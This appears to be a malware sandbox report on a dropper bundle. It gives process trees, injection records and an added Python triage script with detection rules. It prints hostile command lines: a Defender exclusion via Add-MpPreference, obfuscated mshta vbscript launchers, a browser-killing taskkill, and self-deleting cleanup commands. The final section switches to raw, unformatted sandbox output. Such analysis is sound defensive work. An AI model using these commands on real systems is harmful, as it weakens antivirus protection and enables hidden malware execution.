Processes: Sat196ac06a9e6.exe, taskkill.exe, powershell.exe, Sat191649b47c9e2.exe, 795168.exe, WerFault.exe, 7915684.exe, 6384253.exe, Maeqeshyhoto.exe
pid | process | privilege enabled (Token: ...)
- 676 | Sat196ac06a9e6.exe | SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35 (34 entries)
- 2680 | taskkill.exe | SeDebugPrivilege
- 1884 | powershell.exe | SeDebugPrivilege
- 620 | Sat191649b47c9e2.exe | SeDebugPrivilege
- 2872 | 795168.exe | SeDebugPrivilege
- 1620 | taskkill.exe | SeDebugPrivilege
- 1632 | WerFault.exe | SeDebugPrivilege
- 2712 | taskkill.exe | SeDebugPrivilege
- 560 | 7915684.exe | SeDebugPrivilege
- 2932 | 6384253.exe | SeDebugPrivilege
- 1212 | (no process name recorded) | SeShutdownPrivilege (×16, interleaved with the entries below)
- 2216 | WerFault.exe | SeDebugPrivilege
- 2944 | 6384253.exe | SeDebugPrivilege
- 2864 | WerFault.exe | SeDebugPrivilege
- 948 | WerFault.exe | SeDebugPrivilege
- 3048 | Maeqeshyhoto.exe | SeDebugPrivilege

Suspicious use of FindShellTrayWindow 20 IoCs
Processes: ultramediaburner.tmp, iexplore.exe, installer.exe
pid | process (consecutive repeats collapsed with a count)
- 1644 | ultramediaburner.tmp
- 1212 | (no process name recorded) (×4)
- 2552 | iexplore.exe
- 1212 | (no process name recorded) (×4)
- 856 | installer.exe
- 1212 | (no process name recorded) (×2)
- 2552 | iexplore.exe (×7)

Suspicious use of SendNotifyMessage 4 IoCs
Processes:
pid | process
- 1212 | (no process name recorded) (×4)

Suspicious use of SetWindowsHookEx 64 IoCs
Processes: iexplore.exe, IEXPLORE.EXE
pid | process (consecutive repeats collapsed with a count)
- 2552 | iexplore.exe (×2)
- 568 | IEXPLORE.EXE (×4)
- 2552 | iexplore.exe (×2)
- 2764 | IEXPLORE.EXE (×6)
- 2056 | IEXPLORE.EXE (×4)
- 832 | IEXPLORE.EXE (×4)
- 2452 | IEXPLORE.EXE (×4)
- 920 | IEXPLORE.EXE (×4)
- 2552 | iexplore.exe (×2)
- 8164 | IEXPLORE.EXE (×4)
- 2552 | iexplore.exe (×2)
- 2968 | IEXPLORE.EXE (×4)
- 2552 | iexplore.exe (×2)
- 568 | IEXPLORE.EXE (×4)
- 2552 | iexplore.exe (×2)
- 4708 | IEXPLORE.EXE (×4)
- 2552 | iexplore.exe (×2)
- 920 | IEXPLORE.EXE (×4)
- 2552 | iexplore.exe (×2)
- 4660 | IEXPLORE.EXE (×2)
Suspicious use of WriteProcessMemory 64 IoCs
Processes: setup_x86_x64_install.exe, setup_installer.exe, setup_install.exe, cmd.exe
description | pid | process | target process (each edge is logged once per write call; repeats collapsed with a count)
- PID 1996 wrote to memory of 1744 | 1996 | setup_x86_x64_install.exe | setup_installer.exe (×7)
- PID 1744 wrote to memory of 1068 | 1744 | setup_installer.exe | setup_install.exe (×7)
- PID 1068 wrote to memory of 1480 | 1068 | setup_install.exe | cmd.exe (×7)
- PID 1068 wrote to memory of 800 | 1068 | setup_install.exe | cmd.exe (×7)
- PID 1068 wrote to memory of 1920 | 1068 | setup_install.exe | cmd.exe (×7)
- PID 1068 wrote to memory of 972 | 1068 | setup_install.exe | cmd.exe (×7)
- PID 1480 wrote to memory of 1884 | 1480 | cmd.exe | powershell.exe (×7)
- PID 800 wrote to memory of 676 | 800 | cmd.exe | Sat196ac06a9e6.exe (×7)
- PID 1068 wrote to memory of 992 | 1068 | setup_install.exe | cmd.exe (×7)
- PID 1068 wrote to memory of 920 | 1068 | setup_install.exe | cmd.exe (×1, list cut at the 64-IoC cap)
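The WriteProcessMemory records above are logged once per call, so the same parent/child edge repeats seven times and the 64-IoC cap cuts the list off mid-chain; the process tree further down shows the command lines those children ran. The script below is an added triage example, not part of the sandbox output: it de-duplicates the "PID A wrote to memory of B" records into the launch chain and scores a handful of the command lines from the process tree against behavioural rules for what this sample does (a Defender exclusion via Add-MpPreference, mshta with an inline vbscript: payload, taskkill against a browser, and rundll32 loading a file without a DLL extension). The record text and command lines are constructed from this page; the rule names, the regular expressions and the function names are the example's own.

```python
"""Added triage example for this report; not part of the sandbox output.

Rebuilds the launch chain from the 'PID A wrote to memory of B' records
(logged once per write, so each edge repeats) and scores command lines from
the process tree against a few behavioural rules.  The records and command
lines below are constructed from this page; the rules are the example's own.
"""
import re
from collections import defaultdict

# One WriteProcessMemory IoC as the report flattens it:
#   PID <src> wrote to memory of <dst> <src> <src image> <dst image>
WPM_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) "
    r"(?P<src_img>\S+) (?P<dst_img>\S+)"
)

# Constructed from the report: every edge appears seven times and the last
# one is cut off by the 64-IoC cap.
WPM_RECORDS = (
    "PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe " * 7
    + "PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe " * 7
    + "PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe " * 7
    + "PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe " * 7
    + "PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe " * 7
    + "PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe " * 7
    + "PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe " * 7
    + "PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe " * 7
    + "PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe " * 7
    + "PID 1068 wrote to memory of 920 1068 setup_install.exe cmd.exe"
)

# Constructed from the process tree on this page: pid -> (image, command line).
CMDLINES = {
    1884: (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
           r'powershell -inputformat none -outputformat none -NonInteractive '
           r'-Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    860: (r"C:\Windows\SysWOW64\mshta.exe",
          r'"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). '
          r'RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\5771500.exe"" '
          r'C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 '
          r'&If """"== """" for %l In ( ""C:\ProgramData\5771500.exe"") do taskkill -Im '
          r'""%~nxl"" /F " ,0 , TRuE))'),
    1620: (r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im chrome.exe"),
    2548: (r"C:\Windows\SysWOW64\rundll32.exe",
           r'"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY'),
    2680: (r"C:\Windows\SysWOW64\taskkill.exe", r'taskkill /im "Sat19e4750dd01.exe" /f'),
}


def parse_wpm(text):
    """De-duplicate the records into (src_pid, dst_pid, src_img, dst_img) edges."""
    return {
        (int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"])
        for m in WPM_RE.finditer(text)
    }


def render_chain(edges, root):
    """Indented parent -> child listing from `root`, children in PID order."""
    children, names = defaultdict(list), {}
    for src, dst, src_img, dst_img in edges:
        children[src].append(dst)
        names.setdefault(src, src_img)
        names.setdefault(dst, dst_img)
    lines = []

    def walk(pid, depth):
        lines.append(f"{'  ' * depth}{pid} {names.get(pid, '?')}")
        for child in sorted(children[pid]):
            walk(child, depth + 1)

    walk(root, 0)
    return lines


BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
DLL_EXTS = (".dll", ".cpl", ".ocx", ".ax")


def suspicious_cmdline(image, cmdline):
    """Names of every rule the command line trips (empty list if none)."""
    hits, low = [], cmdline.lower()
    if "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion")       # carves an AV-free staging folder
    if image.lower().endswith("mshta.exe") and "vbscript:" in low:
        hits.append("mshta_inline_script")      # script lives in the command line, not on disk
    m = re.search(r'taskkill\s.*?[/-]im\s+"?(?P<proc>[\w.]+)', low)
    if m and m["proc"] in BROWSERS:
        hits.append("kills_browser")            # unlocks browser credential/cookie databases
    m = re.search(r'rundll32\.exe"?\s+(?P<target>[^\s,]+),', cmdline, re.I)
    if m and not m["target"].lower().endswith(DLL_EXTS):
        hits.append("rundll32_odd_extension")   # DLL dropped under a non-DLL file name
    return hits


def triage(records=WPM_RECORDS, cmdlines=CMDLINES, root=1996):
    """Chain listing plus {pid: [rules]} for every command line that trips a rule."""
    hits = {}
    for pid, (image, cmdline) in cmdlines.items():
        rules = suspicious_cmdline(image, cmdline)
        if rules:
            hits[pid] = rules
    return {"chain": render_chain(parse_wpm(records), root), "hits": hits}


if __name__ == "__main__":
    result = triage()
    print("\n".join(result["chain"]))
    for pid, rules in sorted(result["hits"].items()):
        print(f"{pid}: {', '.join(rules)}")
```

Run stand-alone it prints the eleven-process chain rooted at PID 1996 and four flagged PIDs (1884, 860, 1620, 2548); the taskkill against the dropper's own file (PID 2680) is deliberately not flagged, since self-deletion via taskkill plus erase is noisy without the browser-name check. The rules key on the command line rather than the image name because every stage here runs a legitimate Windows binary.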
Processes
(Each entry: [depth] image path (PID), then the command line and the behaviours attributed to that process.)
[1] C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe (PID 1996)
    cmd: "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe (PID 1744)
      cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe (PID 1068)
        cmd: "C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1480)
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1884)
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1920)
          cmd: C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat191649b47c9e2.exe (PID 620)
            cmd: Sat191649b47c9e2.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\ProgramData\795168.exe (PID 2872)
              cmd: "C:\ProgramData\795168.exe"
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\WerFault.exe (PID 948)
                cmd: C:\Windows\system32\WerFault.exe -u -p 2872 -s 1732
                - Program crash
                - Suspicious behavior: GetForegroundWindowSpam
                - Suspicious use of AdjustPrivilegeToken
          [6] C:\ProgramData\8209560.exe (PID 2900)
              cmd: "C:\ProgramData\8209560.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Adds Run key to start application
            [7] C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe (PID 2412)
                cmd: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                - Executes dropped EXE
          [6] C:\ProgramData\6384253.exe (PID 2932)
              cmd: "C:\ProgramData\6384253.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious use of SetThreadContext
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\ProgramData\6384253.exe (PID 2944)
                cmd: "C:\ProgramData\6384253.exe"
                - Executes dropped EXE
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 2216)
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 712
                - Program crash
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: GetForegroundWindowSpam
                - Suspicious use of AdjustPrivilegeToken
          [6] C:\ProgramData\5771500.exe (PID 3032)
              cmd: "C:\ProgramData\5771500.exe"
              - Executes dropped EXE
              - Loads dropped DLL
            [7] C:\Windows\SysWOW64\mshta.exe (PID 860)
                cmd: "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\5771500.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\5771500.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
              [8] C:\Windows\SysWOW64\cmd.exe (PID 2396)
                  cmd: "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\5771500.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\5771500.exe") do taskkill -Im "%~nxl" /F
                [9] C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE (PID 2632)
                    cmd: C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
                    - Executes dropped EXE
                  [10] C:\Windows\SysWOW64\mshta.exe (PID 2668)
                      cmd: "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
                    [11] C:\Windows\SysWOW64\cmd.exe (PID 3056)
                        cmd: "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
                  [10] C:\Windows\SysWOW64\rundll32.exe (PID 2548)
                      cmd: "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
                [9] C:\Windows\SysWOW64\taskkill.exe (PID 2712)
                    cmd: taskkill -Im "5771500.exe" /F
                    - Kills process with taskkill
                    - Suspicious use of AdjustPrivilegeToken
          [6] C:\ProgramData\7915684.exe (PID 560)
              cmd: "C:\ProgramData\7915684.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 2864)
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 560 -s 1760
                - Program crash
                - Suspicious behavior: GetForegroundWindowSpam
                - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 920)
          cmd: C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe (PID 1612)
            cmd: Sat19e4750dd01.exe /mixone
            - Executes dropped EXE
            - Loads dropped DLL
          [6] C:\Windows\SysWOW64\cmd.exe (PID 2644)
              cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im "Sat19e4750dd01.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe" & exit
            [7] C:\Windows\SysWOW64\taskkill.exe (PID 2680)
                cmd: taskkill /im "Sat19e4750dd01.exe" /f
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 992)
          cmd: C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat199ba8a4637dcb034.exe (PID 820)
            cmd: Sat199ba8a4637dcb034.exe
            - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe (PID 972)
          cmd: C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat1946eb84e6.exe (PID 596)
            cmd: Sat1946eb84e6.exe
            - Executes dropped EXE
            - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe (PID 800)
          cmd: C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1732)
          cmd: C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe
          - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1752)
          cmd: C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe
          - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1968)
          cmd: C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe
          - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1864)
          cmd: C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe
[1] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe (PID 676)
    cmd: Sat196ac06a9e6.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe (PID 1832)
      cmd: cmd.exe /c taskkill /f /im chrome.exe
    [3] C:\Windows\SysWOW64\taskkill.exe (PID 1620)
        cmd: taskkill /f /im chrome.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
[1] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exe (PID 1660)
    cmd: Sat19e6a852f849bb2.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies system certificate store
  [2] C:\Windows\SysWOW64\WerFault.exe (PID 1632)
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 976
      - Loads dropped DLL
      - Program crash
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe (PID 988)
    cmd: Sat19c6762a08beae.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
[1] C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe (PID 1740)
    cmd: Sat19ba05e89ea6d406.exe
    - Executes dropped EXE
    - Loads dropped DLL
  [2] C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp (PID 2140)
      cmd: "C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$60136,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe"
      - Executes dropped EXE
      - Loads dropped DLL
    [3] C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe (PID 2528)
        cmd: "C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe" /S /UID=burnerch2
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Program Files directory
      [4] C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe (PID 2960)
          cmd: "C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe" /VERYSILENT
          - Executes dropped EXE
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp (PID 1644)
            cmd: "C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp" /SL5="$30180,281924,62464,C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe" /VERYSILENT
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in Program Files directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of FindShellTrayWindow
          [6] C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe (PID 1996)
              cmd: "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
              - Executes dropped EXE
      [4] C:\Users\Admin\AppData\Local\Temp\f5-5904a-b33-73c84-e4f8fc1c025d0\Vososamime.exe (PID 3008)
          cmd: "C:\Users\Admin\AppData\Local\Temp\f5-5904a-b33-73c84-e4f8fc1c025d0\Vososamime.exe"
          - Executes dropped EXE
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 2552)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
            - Modifies Internet Explorer settings
            - Suspicious behavior: GetForegroundWindowSpam
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 568)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2764)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1586187 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2056)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:734242 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 832)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1192990 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2452)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:799774 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 920)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:799796 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 8164)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:734281 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2968)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1258587 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 4708)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:4011062 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
          [6] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 4660)
              cmd: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:472177 /prefetch:2
              - Modifies Internet Explorer settings
              - Suspicious use of SetWindowsHookEx
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 2636)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 8128)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 1280)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 1192)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 4684)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 4144)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231
        [5] C:\Program Files\Internet Explorer\iexplore.exe (PID 4088)
            cmd: "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
      [4] C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3048 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe /eufive & exit5⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe /eufive6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe" & exit7⤵PID:2356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f8⤵
- Kills process with taskkill
PID:2452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:1036
-
C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exeC:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe /qn CAMPAIGN="654"6⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:856 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133451 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵PID:1908
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe & exit5⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exeC:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2604 -
